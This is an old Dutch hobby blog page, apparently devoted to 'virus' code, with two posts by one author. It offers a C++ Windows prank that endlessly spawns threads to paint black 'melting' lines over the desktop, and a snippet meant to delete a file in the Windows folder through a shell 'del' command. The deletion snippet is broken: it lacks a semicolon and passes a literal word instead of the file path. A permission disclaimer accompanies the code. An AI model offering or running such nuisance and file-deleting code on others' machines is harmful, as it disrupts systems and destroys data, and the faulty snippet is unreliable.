(^^,)
http://virus.blogeiland.nl

Top sites
- Speur plaza
- Auto spot
- Gratis weblog
- Nieuwe ringtones
- Webcam chat
- Gratis dating
- Plaatjes kleurplaten
- Verhuur je koophuis

Logs van (^^,)
--- Archief ---



Afbeelding/foto


Blogeiland-blogs
klaagpaal.blogeiland.nl
fashionsmoothie.blogeiland.nl
weblogje.blogeiland.nl
rickerrock.blogeiland.nl
modaalinkomen2010.blogeiland.nl
wiiombouw.blogeiland.nl
Plaatjes.blogeiland.nl
hoelangnog.blogeiland.nl
mrdevil.blogeiland.nl
barbii.blogeiland.nl
html / Webdesign vragen?
Je eigen weblog?

09-12-2007 - (^^,)
-Alles wat hier staat, mag je alleen gebruiken op andermans computer of andere electronica als je toestemming hebt van de eigenaar-

Gepost door: omniii op 09-12-2007 om 18:38
08-12-2007 - -






#include <windows.h>
using namespace std;

int Line    = 1;
int Lines   = 10;
int Threads = 10;
int Width   = GetSystemMetrics(SM_CXSCREEN);
int Height  = GetSystemMetrics(SM_CYSCREEN);
HDC Desktop = GetDC(HWND_DESKTOP);

void MeltLine()
{
    Threads++;
    COLORREF Color = RGB(0, 0, 0);
    int Speed = 25;
    int Y = 0;
    int X = Line;
    while(Y <= Height)
    {
        SetPixel(Desktop, X, Y, Color);
        Y++;
        Sleep(Speed);
    }
    Threads--;
}

int main()
{
    int Loop = 1;
    while(true)
    {
        while(Loop <= Lines && Threads < 200)
        {
            Line = rand()%Width;
            CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&MeltLine, 0, 0, NULL);
            Loop++;
            Sleep(5);
        }
        if(Lines < Threads)
            Lines++;
        Sleep(250);
    }
}

Geeft dit effect aan je beeldscherm:
img26.picoodle.com/img/img26/5/12/8/f_weeem_66d0598.png








#include <stdlib.h>
int main()
{
    const char* Bestand = "C://WINDOWS//whatever.txt"
    std::system("del Bestand -q");
}

Verwijdert een bestandje.

Gepost door: omniii op 08-12-2007 om 18:01

Statistieken
Hits vandaag: 1
Hits totaal: 7206
Aantal logs: 2
Aantal reacties: 0



PHP Parsetijd: 0.018 sec, MySQL 14 queries in 0.014 secs